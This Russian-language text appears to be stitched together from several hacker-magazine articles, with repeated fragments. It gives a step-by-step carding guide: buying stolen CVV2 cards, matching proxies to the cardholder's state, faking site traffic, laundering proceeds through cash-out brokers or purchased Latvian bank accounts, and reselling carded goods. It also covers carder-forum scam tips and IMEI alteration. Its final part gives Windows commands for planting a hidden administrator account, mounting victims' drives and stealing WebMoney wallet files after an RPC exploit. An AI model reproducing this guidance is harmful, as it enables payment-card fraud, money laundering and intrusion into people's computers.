После того как проект будет готов, можно идти на сайт партнера и регистрироваться. Если все пройдет нормально и у него не появятся лишние вопросы, в скором времени ты получишь письмо с поздравлениями и дальнейшими инструкциями. Вешай на свой сайт баннеры и приступай к дальнейшей работе.
Подведем краткие итоги. Наш сайт должен иметь:
Особенности вбива
Теперь, когда у тебя есть сайт, который рекламирует партнера, самое время для торжественной части. Тут много тонкостей. Про все рассказать не удастся, т.к. у каждого партнера свои заморочки. Но основные принципы обсудить стоит. Прежде всего, тебе понадобятся сами карты, которые ты будешь вбивать (расплачиваться за услуги спонсора). Если у тебя уже есть своя база или ты можешь взламывать интернет-магазины, то одна из статей расходов исчезает. Ну а если нет, то это совсем не проблема. Я думаю, не стоит объяснять, что сгенерированные карты уже давно никто не принимает. Карты (далее - сс) всегда можно купить в интернете у людей, которые занимаются их добычей и продажей. Найти продавца сс можно на кардерских сайтах и форумах. При выборе продавца обязательно узнай, насколько он надежен. Обычно на форумах можно посмотреть дату его регистрации и отзывы других покупателей. Тебе понадобятся карты с CVV2 кодом. Скорее всего, ты будешь использовать сс из Америки. Средняя цена в интернете - $2 за одну сс.
Бери сразу не одну-две сс, а штук 50-100. В этом случае ты можешь получить скидку от продавца. Лучше всего покупать дебитные сс, поскольку чарджбэк по ним идет дольше, месяца 3-4.
Однако карты - это еще не все. Стоит позаботиться и о своей безопасности. Для этого тебе понадобятся прокси-серверы. Не стоит надеяться на прокси, взятые из публичных источников, т.к. большинство процессингов также имеют эти списки и строго следят за тем, чтобы клиент, производящий оплату, не зашел под ними. Нам понадобятся SOCKS прокси. Желательно, чтобы прокси, которыми ты будешь пользоваться, были того же штата, что и твоя сс. Поэтому приобретать их тебе придется у людей, которые специально предоставляют подобные сервисы. Найти их можно также на кардерских форумах. В среднем, доступ к базе анонимных прокси будет стоить в месяц $60.
Но и это еще не все. Что подумает партнер, когда обнаружит, что из трех пользователей в день, заходящих к тебе на сайт, все тут же кликают на баннер и покупают его услуги? Ситуация очень странная. Могу сказать сразу, что письма партнеру с лестными отзывами о баннерах, имеющих КПД 100%, вряд ли его убедят. Значит - наш сайт должен иметь хорошую посещаемость, или хотя бы делать вид, что он ее имеет. В среднем КПД баннера – 0,1%, так что не будем отступать от этого правила - на каждый вбив создавай трафик около 1000 пользователей. Сделать это можно по-разному. Можно самому написать скрипт, можно найти бесплатные скрипты в интернете или купить. Но самый простой вариант - это купить трафик. Стоимость разная, в среднем - $1 за 1000 посещений. Люди, которые этим занимаются, называются трафагонами, и их всегда можно найти на тех же кардерских форумах.
Если все вышеперечисленное у тебя есть, можешь начинать работать. Сколько карт в день вбивать - зависит от твоей наглости. Если ты будешь вбивать по 1-2 сс в день, это будет вполне нормальный вариант.
Итак, для успешного вбива необходимо:
Забираем кеш или тонкости обнала
Допустим, все прошло успешно, и ты работаешь уже месяц. Естественно, пора подумать о том, как забрать свои деньги, пока не пошли чарджбэки. Если твой партнер высылает деньги на WebMoney или E-Gold, то все очень просто – достаточно зарегистрировать аккаунт в нужной системе и перечислять туда деньги. Как обналичить Webmoney, я думаю, все знают, об этом подробно написано на их сайте. В случае с E-Gold пугаться тоже не стоит. В интернете много контор, занимающихся обменом – о них ты прочитаешь в статье «8 хитрых способов обнала денег с кред».
Сложнее, если тебе будут перечислять сумму посредством банковского перевода. Хотя вся сложность состоит в том, что придется найти нальщика. Как всегда, найти его можно на кардерских форумах. Нальщик возьмет с тебя процент (какой именно - ты договоришься с ним). Также придется договориться и о том, как тебе удобнее будет получить деньги. Надо сказать, что обналичивание денег - один из самых главных моментов. Прежде чем обращаться к нальщику, стоит посмотреть его рекомендации. Если нальщик хороший, то люди, работавшие с ним, обязательно оставят о нем отзывы. Тут может возникнуть проблема: обычно нальщику, особенно если он профи, не очень выгодно работать с суммами меньше $1000. Поэтому меньшую сумму он может и не принять. В этом случае можно действовать по-разному: можно все же уговорить его принять $500, а можно просто подкопить еще денег на счету.
Кстати, с нальщиком лучше договориться заранее, еще до подключения к партнерской программе. Дело в том, что счет, на который будут идти твои деньги, возможно, придется указывать во время регистрации. Лучше, если все будет готово заранее. Это избавит от непредвиденных сюрпризов.
Для обналичивания подойдет обычный счет где-нибудь в Латвии. При особом желании и наличии лишних денег счет можно открыть самому, а можно купить уже готовый. Большинство прибалтийских банков могут открыть счет без личного визита к ним. Для этого тебе понадобятся ксерокопии некоторых документов (каких именно - зависит от банка). После чего их надо послать по почте или по факсу. Если все пройдет удачно, то ты получишь конверт, в котором будет дебетная карта (Visa Electron или Cirrus/Maestro) с пин-кодом, а также инструкции для онлайнового управления счетом. Такой счет будет очень полезен и в дальнейшем. Он обязательно окупится, если, конечно, не запороть его после первого же перевода. Кроме того, теперь уже не придется отдавать проценты нальщику, и появится возможность обналичивать суммы меньше $1000.
В правилах партнера необходимо внимательно прочитать, в какие страны он может делать переводы. Если этого нет в правилах, придется написать письмо в службу поддержки и спросить об этом. Может оказаться, что они переводят деньги только в пределах США или другой страны.
В общем, для обналичивания денег нужно:
Одним выстрелом двух зайцев
Если все было сделано правильно, то уже через месяц-полтора в твоем кармане осядет некоторая сумма денег. Как долго будет работать проект - зависит только от тебя и от жадности кардхолдеров. За месяц проект может легко окупиться, плюс принести некоторую прибыль. Дальше все деньги будут идти уже тебе в карман. Но, как всегда, денег хочется больше. И это, в принципе, не проблема.
Допустим, ты рекламируешь хостинг своего партнера. А зачем выбрасывать на помойку честно накарженный товар? Куда более разумным решением будет продать этот хостинг, например, в два раза дешевле. Попробуй найти людей, которым он будет нужен. Если продавать его на кардерских форумах, то лучше сразу предупредить покупателя, что товар скаржен, чтобы избежать дальнейших разборок. Лучше будут продаваться темплейты, т.к. они уже есть и их не закроют, как, например, хостинг. Самое выгодное - это, как я говорил, dedicated servers. Их можно использовать и в своих целях.
И в заключение...
Я постарался показать, что кардинг - это все же творческий процесс. Главное верить в свои силы, и тогда все должно получиться. Сначала все кажется очень сложным, но если потратить немного времени, то картина быстро проясняется. Конечно, на пути тебя будут подстерегать неожиданности, но рассказать обо всех невозможно. Связанно это с тем, что многое меняется очень быстро, да и в каждой компании свои правила и порядки. Думаю, многие меня осудят, сказав, что кардинг - это противозаконно и аморально. Совершенно с этим согласен, поэтому никого не призываю заниматься чем-то подобным.
Список сайтов, на которых можно найти много полезного для начинающего кардера
carder.market
CSU
Ver
Но не кидайся на первый попавшийся сайт, сначала пройдись по разным компаниям и изучи их условия.
Ну а самый сладкий кусочек - услуга dedicated servers (аренда сервера). Стоит это удовольствие недешево, поэтому и проценты будут немаленькие.
Дизайн сайта должен быть добротным. Совсем не стоит делать летающие звезды или прыгающих зайцев, то есть всего того, что в народе называют попсой.
Тебе понадобятся SOCKS прокси. Желательно, чтобы прокси, которыми ты будешь пользоваться, были того же штата, что и твоя сс.
Лучше всего покупать дебитные сс, поскольку чарджбэк по ним идет дольше, месяца 3-4.
Для обналичивания подойдет обычный счет где-нибудь в Латвии. При особом желании и наличии лишних денег счет можно открыть самому, а можно купить уже готовый.
Основу проблемы <кидков> создают доверчивые люди которых обманывают, ведь в 90% случаев обмана человек переводит деньги или оказывает услуги <вперёд> , основная масса кинутых в кардинге и в других сферах - новички , которые либо не до конца разбираются в том чем занимаются, что даёт кидале дополнительный шанс обмануть жертву, сыпя терминами, либо слишком доверчивы, так что если вас обманули в большинстве случаев можете записывать себя в ряды новичков или доверчивых. Ещё запомните фразу <скупой платит дважды> в контексте кидал она как никогда актуальна.
Как становятся кидалами или с чего начинается обман:
В своём большинстве кидалами становятся те кто не смог достичь каких-либо успехов в том чем занимается он и его окружение.
В итоге человек разочаровавшись видит что другие зарабатывают что-то а он ничего не получает. Сразу на ум приходит мысль - <а почему бы не взять у своих> . Чаще всего кидалы получаются из тех кто купил енролл, попробовал заняться вещевухой, у него ничего не вышло но енролл ещё не сдох и он берёт на каком-то форуме постит <продаю енролл mbna>, к нему стучится пару человек и он ВСЕМ им продаёт этот енролл. Вроде обмана как такового нет - все получили то что хотели (фактор продажи товара в несколько рук мы не рассматриваем) однако с очень большой вероятностью никто из купивших рол ничего не добьется и примкнёт к стае <обиженных и угнетённых>, это первая стадия.
Дальше он вспомнив ход сделок , опять запостит <продаю енролл сити> (так как он дороже) к нему постучит 10 человек из которых 7 нормальных а 3 новичка , 7 не захотят с ним работать так как он не даст логин и пароль вперёд (у него их нет) а трое возьмут да и купят, переведя wmz. Вывод - кидала почувствует деньги и навсегда останется мошенником , даже в дальнейших возможно честных сделках первая мысль у него будет <а как же мне обмануть>.
Признаки обмана и кидалы:
кидала хочет получить деньги быстрее и ему все равно на исход сделки так как при <удачном> раскладе он все равно останется в плюсе , так что первая характерная черта кидал - спешка, они придумывают кучу побочных факторов провоцирующих ускорение сделки: беременная жена , блокировка кошелька , беспокойство дропа итак далее, таких <подмазок> можно придумать кучу.
Кидала хочет показать себя шарящим человеком поэтому постоянно употребляет не в меру большое количество терминов / спецефических слов.
Как крутой кардер кидала <живёт в юса> и он <бомж у которого нет денег на русскую клавиатуру>, посему он пишет транслитом, но иногда (при длительном общении) проскакивают фразы на русском. Стандартным ответом если его напрячь по данному вопросу (теоретически) будет <я общаюсь с нерускоговорящими партнёрами> , однако сам он ни на английском ни на китайском ни 1 слова не знает (это легко проверить стукнув ему с другой аси).
Кидала пишет по исключительно на английском - первый напрашивающийся вывод - <он иностранец и на русском не муму> такой вывод обычно сразу повышает уровень доверия. Так же факт незнания языка, грамматические ошибки и постоянных смайлы или знаки вырывающихся эмоций. По типу "ой как чешутся руки, и ещё чуть-чуть и я его обману и кину". В большинстве случаев это либо реальные олени/домохозяйки которые на русском не говорят либо как чаще и бывает наши соотечественники - кидалы. Проверить это довольно просто, как и в вышеописанном пункте стукнуть с другой аси , основные варианты стука: предложить ему то от чего он не сможет отказаться, постучать от имени <Маши> у которой заполнена вся инфа в асе и которая хочет познакомиться, чаще всего кидала клюнет.
Ник кидалы. Жадность и несдержанность частенько проявляются в никах которые меняются как перчатки, но как только видим Экспресс, Фаст, Изи и так далее, да еще в придачу с словом бабло, кэш, капуста уже стоит быть осторожным и собственно говоря начинать проверять человека.
Номер icq или jabber кидалы. Сейчас шестизначные номера аси не является признаком <крутости>, поэтому судить по номеру нельзя. Аналогично с датой регистрации на форуме - пример тому <лука> с cw по этому признаку тоже судить нельзя.
Количество постов кидалы - у потенциального кидалы либо слишком маленькое относительно даты регистрации, либо наоборот сильно большое (набивает посты). Перед сделкой с ним, рекомендуется почитать что человек пишет на форумах, и оценить его адекватность , если это тупой набой постов то вывод делайте сами.
Неадекватное поведение/разговор - говорит много не по делу , говорит много о другом деле , хочет сразу с тобой заняться многим , корешится. Так же кидалы очень любят орать что-то типа "да ты кидала?! решил меня кинуть?" как говориться меряют людей по-себе.
Фразы в духе <я на форумах особо не тусуюсь , работаю на заказ итд> такое бывает но редко. Желание работать сразу на большие суммы без предварительной проверки и спешка мол закроется ВЮ офис или отмазки что "тестовыми заливами спалишь дропа" тоже в принципе свидетельствует о том что надо быть осторожным.
Очень много кидал начали делать посты и в конце приписывать, работаю только через гаранта, но когда заходит разговор о сделке появляется куча отмазок и отговорок иногда даже звонки с целью запудрить мозг.
Вывод: ни 1 из перечисленных выше факторов не может говорить о том что чел кидала но в совокупности они дают знать что с ним лучше не иметь дел, общая тактика кидалы - запудрить жертве мозг.
Как проводить сделки:
С непроверенными людьми исключительно через гаранта не пожалейте 10-20$ даже если товар столько и стоит. Если вас кинут - у вас останется негативное впечатление и деньги попадут мошеннику в руки, что как было описано выше скорее всего подвигнет его к новым обманам, а если вы заплатите гаранту и проведёте сделку успешно то у вас будет <проверенный> (не факт что он не кинет вас в последствии на более крупную сумму) селлер и гарант получит свои честно заработанные деньги которые в большинстве случаев пойдут на развитие форумов - все будут рады.
В случае работы без гаранта, работайте только с известными людьми либо только при наличии положительных отзывов (от проверенных участников , чтоб избежать факта самоотписа отзывов). как правило новичкам в этой ситуации приходиться тяжело, особо ничего нет показать, материалы достали и хочется продать, в общем такой замкнутый круг и к сожалению очень много способных начинающих ребят оказывается или обмануты или с ними просто ни кто не хочет работать, в принципе чтобы избежать подобной судьбы советуем начинать потихоньку и без особых понтов.
Если не уверены в человеке - не стоит мучить его, навязывая ему свои хитрые условия сделки, ищите другого. Так как этим вы у нормального человека сложите о себе мнение тормоза, а кидале не дадите вас кинуть тем самым потратив своё и чужое время.
Да в принципе вариантов тут остается маловато.
Или делайте сделки через гарантов или с проверенными людьми, варианты мол дам своего гаранта тоже очень часто могут оказаться обманом.
Вариант 50 сейчас 50 потом работает более-менее гладко, хотя если человек не кидала то дать все 100 вперёд не проблема.
Для уточнения кем является человек , особенно стучащий вам , обязательно просите его отправить вам PM на форуме.
Сегодня, да, в общем-то, как и всегда, все хотят халявы. Это слово прижилось в сознании русского народа. Каждый хочет бесплатного проезда в метро, бесплатной автостоянки возле магазина рядом с домом, бесплатного туалета, даже бесплатных пакетов в супермаркете. Сотовая связь не исключение. Только сейчас на рынке мобильной связи эта проблема теряет актуальность, а в начале девяностых она была весьма насущной. В наши дни никто не будет тратить на сотовую связь 20-30 баксов в день - легче купить безлимитный тариф, а лет десять назад такой тариф в год обходился в стоимость нового автомобиля бизнес-класса.
А народ хотел дешевле…
Народ хотел дешевле, а операторы не снижали цены в силу многих причин - за что и расплачивались в буквальном смысле. Именно в то время начали появляться так называемые фрикеры - телефонные пираты. Многие думают, что если сосед дядя Вася с седьмого этажа поменял прошивку на своем сотовом телефоне, то он автоматически стал фрикером. Нет. Настоящие фрикеры были специалистами своего дела – в то время их было очень мало, а сейчас практически нет. Это выпускники МИФИ, МВТУ имени Баумана и других сильных вузов, где программирование, высшая математика и радиоэлектроника стоят не на последних местах в списке изучаемых дисциплин. Они делали связь бесплатной, чем привлекали внимание общественности и соответствующих силовых структур. Именно тогда было создано небезызвестное Управление «Р», занимающееся преступлениями в сфере высоких технологий. Сейчас такие фрикеры не востребованы, потому что их работа не окупается, а в начале девяностых они легко зарабатывали в день сумму с четырьмя нулями и далеко не российских рублей. Именно те девяностые ознаменовались спадом российской экономики, тогда деньги валялись на земле – их нужно было только поднять, и фрикеры поднимали.
Отпустите меня в Гималаи
Все начиналось с пресловутых телефонов «Алтай», с которых звонили родственникам в Америку. Причем бесплатно и много, за счет людей, к которым нелегально подключались. Потом все перешло на сотовые. С ними, однако, все сложнее – ведь в мобильном телефоне есть SIM-карта, которую определяет базовая станция и регистрирует в сети по ее номеру – а не по номеру сотового. Безусловно, я имею в виду стандарт GSM. Этот номер и вся другая важная информация (PIN, PUK и пр.) закодирована на SIM-карте 128-битовым ключом. Самая большая проблема была в том, чтобы подобрать этот ужасно-много-битовый ключ. Сделать это в домашних условиях можно только банальным перебором. И именно этим занимались настоящие фрикеры. Но об этом чуть позже, а пока я расскажу тебе необходимый минимум теории.
Вообще, вся зона охвата территории оператором делится на относительно маленькие соты (их диаметр - в среднем 5 километров). В городе, как правило, это расстояние – метров 600, за городом – около четырех километров. Как только абонент переходит с включенным телефоном из одной соты в другую, его регистрирует базовая станция той соты, на которой он в данный момент находится. Расстояние до ближайшей базовой станции определяется элементарно. Во многих аппаратах эта уникальная опция скрыта, ее просто нужно найти. Мобильный телефон определяется по-другому: у каждого аппарата есть пятнадцатизначный серийный номер – IMEI. Первые четырнадцать цифр этого номера фиксировано устанавливаются при прошивке, пятнадцатая генерируется псевдослучайно. У всех телефонов IMEI изначально разный; к определению и регистрации в сети он никакого отношения не имеет. Он нужен для того, чтобы узнать владельца аппарата, если это необходимо. Но это намного более трудоемкое и неблагодарное занятие, чем определение местоположения активной в данный момент SIM-карты. Серийный номер мобильного телефона говорит о многом. По нему можно узнать номер партии, к которой принадлежит данный телефон. А по номеру партии - «серый» этот сотовый или нет.
SIMEdit и RS-232
Много ходило и ходит легенд о перепрошивке SIM-карты. Некоторые из этих легенд никакого отношения к самой перепрошивке не имеют. Перепрошивка, или клонирование, SIM-карты, на самом деле нетрудоемкий процесс, но он требует больших материальных затрат, прямых рук, светлой головы и большого количества свободного времени. Очень часто я слышал рассказы о том, что люди создавали образ симки, имея в руках только комплекты PIN и PUK-кодов от этой самой SIM-карты, а потом с помощью кабеля RS-232 запросто перепрошивали ее в самом телефоне. Это бред. На данный момент я не знаю человека, который смог бы перепрошить SIM-карту удаленно, и, наверное, не узнаю никогда.
Также упоминалась программа SIMEdit, которая может «абсолютно» все, на поверку оказавшаяся обычным редактором телефонной книги, деревянным и не бесплатным. Узнать тот самый 128-битовый ключ SIM-карты можно только с помощью мощнейшего криптоанализатора (стоимость которого заоблачна для среднестатистического пользователя), и не меньше чем за 10 часов. Есть еще одно «но»: за эти десять, а может, и больше часов идет сильнейшая нагрузка на SIM, и некоторые экземпляры карточек этого не выдерживают и сгорают.
Жаркая весна сорок пятого
Иными словами, при себе, минимум на полдня, нужно иметь SIM-карту товарища, которая обязана выжить, потому что ей еще предстоит работать. Но фрикеров такие нюансы не останавливали, а даже наоборот – вдохновляли. Они находили симки, делали их образы и выкидывали сотни сгоревших. Телефонных хакеров не останавливало даже то, что с перепрошитой карты можно только делать звонки, а не принимать их. В то время минута, по теперешним меркам, стоила очень дорого, и этот бизнес того стоил.
В мае 2002 года в российских СМИ появилось заявление о том, что специалисты из компании IBM смогли взломать код SIM-карты с помощью только общедоступных электронных приборов за несколько минут. Т.е. любой дядя Вася, о котором я упоминал ранее, может с помощью одного паяльника за пять минут взламывать симки. Естественно, такой расклад не понравился никому. Сразу же после этого феноменального открытия (не факт, кстати, что оно было открытием – у нас тоже не дураки сидели), по технологии, предложенной IBM, к кодовой матрице была добавлена вспомогательная, беспорядочно сгенерированная, которая усиливала защиту SIM-карты на порядок и прикрывала обнаруженную дырку. К этому времени фрикерство постепенно изжило себя.
С телефонами же стандарта DAMPS, AMPS и пр. дела обстояли намного проще. Информация о сим-карте хранится у них в энергонезависимой памяти телефона – eeprom’е. Чтобы сделать «двойник» такого телефона, нужно всего лишь изменить IMEI, который, кстати, никак не зашифрован.
No pain, no game
Хакеров ловили и сажали. Их было немного, и поймать их было нетрудно. Им подсылали подставных лиц под видом покупателей, а потом брали с поличным. Намного больше было людей, которые пользовались левыми SIM-картами, и посадить их было сложнее. Им нечего было предъявить. А Управлению «Р» надо было повышать раскрываемость телефонных преступлений, потому что заявлений приходила уйма. Операторы сами пытались бороться с хакерами. Множество людей обращались в центральные офисы с вопросом: «А откуда у меня в распечатках счетов такие огромные суммы и непонятные телефонные номера?» Абоненту вдвойне компенсировали украденную сумму, просили вычеркнуть свои телефоны и начинали работать с оставшимися. По этим номерам пытались выйти на «двойников», но результатов, естественно, эти оперативно-розыскные мероприятия не давали. Так было в самом начале, сейчас же такие проблемы могут возникнуть из-за неточности систем биллинга. Но до сих пор для меня остается загадкой, почему операторам это всегда идет в плюс.
Пионер всегда готов, как Гагарин и Титов
Но шло время, поднимать деньги с пола стало намного сложнее, особенно сидя. Нужно было искать более законные методы. Законные в том смысле, чтобы в Уголовном кодексе не было по этому поводу законов. На рынок связи пришла новая волна фрикеров, которых фрикерами-то не назовешь. Их стало очень много. Они просто умели тупо производить разлочку сотовых телефонов и последующую их русификацию, нажимая клавиши на клавиатуре в определенном порядке. У них не было никакого багажа знаний, о том, как это делать, им рассказали умные люди, которые, в большинстве своем, шлифовали к тому времени нары.
Чуть раньше разлочить телефон стоило дорого: в розницу порядка 40-50 американских президентов. Аппараты стоили в России намного дороже, чем на Западе. Их оттуда и везли. Здесь телефоны перепрошивали под наши сети. Именно в то время появилось понятие «серый» телефон. Сейчас «серых» практически нет, правда, иногда в Москве можно увидеть крупные партии. Но не тогдашнего масштаба, когда только в офисах операторов продавали сертифицированное оборудование. Тут пришло и много зеленых фрикеров, и цены стали обвально падать: буквально до двух-трех долларов за штуку. Каждый хотел урвать свой кусок, и нерезиновый пирог пришлось поделить на огромное количество человек. Тогда для тех, кто был не в курсе (а их было подавляющее большинство), разлочка телефона стояла на одном уровне сложности с перепрошивкой SIM-карты. Они были практически правы, но этот уровень для них был самым последним. Когда гражданин узнавал, что «тот вон парень в рыжей футболке перепрошивает телефоны», он сразу проникался глубоким уважением к этому человеку.
Серийные номера
Используя информацию о мобильниках, которая на данный момент лежит в интернете, можно практически с любым телефоном вытворять что угодно. Можно заблокировать сотовый на сеть, на отдельную SIM-карту, снять с телефона код блокировки, изменить IMEI и много чего другого. Кстати, про IMEI. Однажды с моей знакомой приключилась неприятная история. В институте у нее украли телефон, и она обратилась в офис оператора с вопросом о возможности возврата ей ее сотового. Оператор сказал, что это не вопрос. Он объяснил, что нужно только подать заявление в милицию, и он (оператор) сам по серийному номеру телефона найдет аппарат, ведь каждый номер уникален. Они ей совершенно серьезно сказали, что IMEI изменить невозможно, когда я буквально за несколько часов до этого менял первые одиннадцать цифр серийного номера мобильного на номер своего сотового телефона в международном формате. Именно поэтому в самом начале я сказал, что IMEI разный у всех телефонов только изначально, на этапе их выпуска с конвейера.
Потом можно найти телефон с таким же серийным номером, как у твоего, причем не один. Возникает предположение, что операторы сотовой связи просто делают вид, что они не в курсе.
Flash, eeprom и другие страшные слова
Как я уже говорил, разлочить телефон просто, так же просто, как и достать для этого программное обеспечение. Чтобы заставить сотовый работать в необходимом качестве, нужно изменить его память, т.е. перепрошить ее. Я говорю про flash-память телефона. Только не про тот flash, который ты засовываешь в цифровой фотоаппарат или mp3-плеер, и не про тот, который ты наблюдаешь в интернете. Телефонный flash – это практически то же, что и операционная система компьютера. Это все телефонное меню, игры, калькулятор, диктофон и пр. Эта память - как матрешка, которая продается на Старом Арбате. Самая большая – flash, в нее входит eeprom, который значительно меньше. В eeprom’е записана вся информация по кодам блокировки телефона, настройкам аппарата и другим нужным штуковинам. И самая последняя – память, содержащая IMEI и дату выпуска телефона – она, в свою очередь, является частью eeprom’а. Для русификации телефона производятся изменения во всем flash’е, для разлочки телефона или смены серийного номера – в eeprom’е. Flash в среднем весит 14 мегабайт, eeprom – 53 килобайта, поэтому для разлочки телефона легче из аппарата выкачивать именно eeprom, и с ним уже работать дальше. Единственный нюанс – проверка контрольной суммы. Если во flash’е стереть что-то нужное или добавить лишнее, телефон в лучшем случае откажется работать.
Универсальная программа
Нужно было найти софт, который бы выкачивал flash из телефона, а потом закачивал его обратно. Раньше эти программы были страшным секретом, многие даже не знали, как они называются, некоторые делали их самостоятельно, но от этого суть не менялась. Сейчас я расскажу про программу для работы с телефонами марки Siemens. Ребятам-разработчикам этой программы поставили памятник при жизни. Эта штуковина называется Unisiemens, достать ее можно в любом месте Интернета, и она проста в применении. С ее помощью можно скачать и flash, и eeprom, и даже кусок flash’а с определенного адреса, а потом залить это все обратно.
Есть два способа разлочить телефон. Самый простой способ: скачать из такого же, но не незалоченного, телефона eeprom и залить его на залоченный. Самый сложный способ: слить eeprom из залоченного телефона – он будет представлять собой обычный бинарник, и разбираться с ним в шестнадцатиричном редакторе. Я в свое время выбрал HexEditor – он до сих пор лежит у меня на почетном месте. Выбор за тобой. Практически так же меняется IMEI телефона, правда для этого существуют немного другие программы, но в интернете их тоже достать несложно, а пользоваться еще легче.
У меня самый первый разлоченный телефон был мой собственный. Я его заблокировал, а потом перепрошил. Я очень за него боялся – он стоил больше трехсот баксов, а другой я покупать не хотел. Но все прошло нормально. И после этого я уже не боялся ничего.
И снится нам не рокот космодрома…
Но фрикеры занимались не только разлочкой аппаратов и дублированием SIM-карт. В то время существовали возможности прослушивания разговоров по мобильным телефонам. Оборудование стоило порядка пятидесяти-ста тысяч долларов. Главное, чтобы были заказы, правда, за абонентами нужно было бегать в пределах одной соты. Шифровка тогдашнего GSM’а, которой, к слову сказать, почти и не было, на несколько порядков была слабее шифровки GSM’а сегодняшнего. Раньше операторы не задумывались о возможности таких случаев, пока не посадили пару «шпионов». Теперь же сотовая связь практически безопасна: даже операторы сами не могут слушать абонентов. Но бывает, что операторы снимают шифрование с сети. Наверное, все помнят недавний теракт в Тушино во время праздника Крылья. В тот день на территории аэродрома, где проходил праздник, до вечера были отключены все базовые станции. Иными словами, образовался информационный колпак, блокирующий услуги всех московских операторов сотовой связи. Буквально в следующие дни по всей Москве по приказу правительства была отключена шифровка разговоров на всех сотовых телефонах стандарта GSM. Тогда абоненты на три дня смогли почувствовать себя в девяносто третьем.
А сейчас…
Сейчас, в силу причин, о которых я рассказал выше, телефонный фрик стал историей. Сегодня совсем другая, на несколько порядков сильнее, защита сотовых сетей и SIM-карт, другое время, другие понятия. Те фрикеры знали, что только на первом этапе появления сотовой связи в России можно зарабатывать большие деньги. Они знали, что такие времена быстро пройдут. И те, кто был хитрее, отхватили больше всех и ни о чем потом не жалели. По крайней мере, на хлеб с икрой им хватало вполне.
Теперь прошли времена телефонов размером с двухкассетный видеомагнитофон, а цена минуты разговора с пяти американских долларов скатилась до SMS за один американский цент. Уже давно никто не перепрошивает SIM-карты, зато на Митино непонятно откуда берутся номера карточек предоплаты, написанные в столбиках на листах бумаги. Но это уже информационный фрик, который прочно занимает место телефонного.
Сегодня совсем другая, на несколько порядков сильнее, защита сотовых сетей и SIM-карт, другое время, другие понятия.
Я думаю, тебе не терпится что-нибудь сделать со своим телефоном, а разбираться с flash’ом вручную неохота. По глазам вижу и понимаю. Наверное, тебе уже хочется поменять несколько чисел серийного номера телефона на год своего рождения. Сегодня я предоставлю тебе эту уникальную возможность. Раз уж мы в статье упоминали про Siemens, то с ним и будем работать. Приготовься стать настоящим фрикером.
Приготовился? Поехали. Для того чтобы изменить IMEI своего телефона, нужно:
Как ты уже заметил, функции программы на этом не ограничиваются. Надеюсь, намек понят. И напоследок: если тебе это все очень интересно, зайди на ftp://vts.vlad.ru/pub/. Ты обязательно найдешь там что-нибудь для своего телефона.
Как обчищают богачей
Все люди зарабатывают себе на жизнь. Причем различными способами. Некоторые выбирают обогащение в виртуале. При этом сам заработок не всегда бывает честным. Человек рискует, проводит важные банковские операции, продает кредитки, покупает различные вещи... и в какой-то момент все теряет. Из-за собственной невнимательности его полностью обчищает хакер Вася из Мухосранска. Почему так происходит, и как взломщику удается напасть, на, казалось бы, защищенных кардеров? Давай попробуем разобраться.
Укротим систему!
Способов украсть ценную информацию и сбережения кардера очень много. Но стоит оговориться, что в этом деле главное не количество, а качество, то есть успешное применение этих способов.
Итак, самое время рассказать, как же хакер может украсть данные у жертвы. Во-первых, это взлом компьютера богатого буратино. Здесь - как повезет, ничего нельзя сказать наверняка. Если человек - раззява и не читает багтраки, то шансы хакера резко возрастают. В противном случае, да еще и с установленным на машине фаерволом, этот способ непригоден.
Как же ломают рабочие станции пользователей? Тут также существуют свои способы. Остановимся на бажной WinNT. Ты всегда думал, что если винда имеет префикс NT, то у нее стопроцентная защита? Я тебя разочарую. В таких платформах были найдены очень опасные баги.
RPC-эпидемия
Если ты не знаешь об RPC-уязвимости, то у тебя позднее зажигание. Об этой ошибке трубили все порталы по безопасности, а также было выпущено множество эксплоитов, в том числе и для Windows (рай для скрипткидисов). Как же хакер может поиметь бабла с наивного буржуя, который, наверное, и не знает о существовании патча от RPC-баги? Очень просто. Достаточно завладеть доступом к его системе и набрать ряд консольных команд. После этого все важные документы будут находиться в лапах злоумышленника.
Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.
Чтобы не использовать шумный эксплоит (который, кстати, может разрушить RPC-вызовы и привести систему к краху) каждый раз, можно создать аккаунт администратора. Его, как известно, пустят на такие ресурсы, как C$, D$ и прочие. Это сделать очень легко. Достаточно лишь набрать следующие строки:
net user admin nimda /add (добавляем нового пользователя admin с паролем nimda, параметры можно подставить свои).
net localgroup Administrators admin /add (присвоим пользователю группу Administratots).
В случае, когда локализация платформы не английская, необходимо подставить название группы на родном языке. Для этого хакер набирает "net user" и узнает истинное название группы.
Если все было сделано верно (команда net обязательно сообщит хакеру о результате операции), взломщик может зайти на машину с локального компа. В этом ему помогает команда "net use z: \\IP-ADDRESS\C$". Но он этого никогда не сделает по одной простой причине - на машине ведутся логии, и его IP-адрес обязательно будет записан. Но выход есть - хакер заходит не с себя, а со своего любимого скарженного шелла.
Эта команда актуальна для Linux. После запроса пароля хакер попадает в системный ресурс $C (для того чтобы выполнить подобные действия, взломщик предварительно устанавливает на машину пакет samba).
Но иногда простого доступа к директориям недостаточно. Например, в том случае, когда необходимо протроянить юзера или поставить на машину кейлоггер (а также просмотреть лист процессов, убить один из них и т.д. и т.п.). В этом случае взломщик либо вешает дополнительный бэкдор, либо использует эксплоит каждый раз.
Кто ищет, тот всегда найдет
В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file". Многие руководства по взлому винды пишут об обязательном аккаунте на каком-либо TFTP-сервере. Однако можно выполнить операцию через обычную команду ftp. Предварительно составляется сценарий, который состоит из простых операций, передаваемых ftp. Он может выглядеть, например, следующим образом:
Пример FTP-сценария
После составления (команды сценария последовательно записываются в файл с помощью echo и стандартного перенаправления ввода) скрипта, он передается консольной утилите с помощью параметра -s:имя_файла. Следует учитывать, что аутентификация была произведена в одной команде, поэтому добавляем к командной строке опцию -n.
Следует отметить, что в винде нет команды поиска, которая присутствует в Linux. Но это совсем не означает, что найти файл в консоли невозможно. Предметом охоты для хакера являются кошельки WebMoney, которые имеют расширение kwm и pwm. Их можно найти следующей командой:
При этом будет выполняться рекурсивный вывод всех каталогов с диска c:\ и последующая фильтрация файлов с помощью команды find.
WebMoney - радость кардера
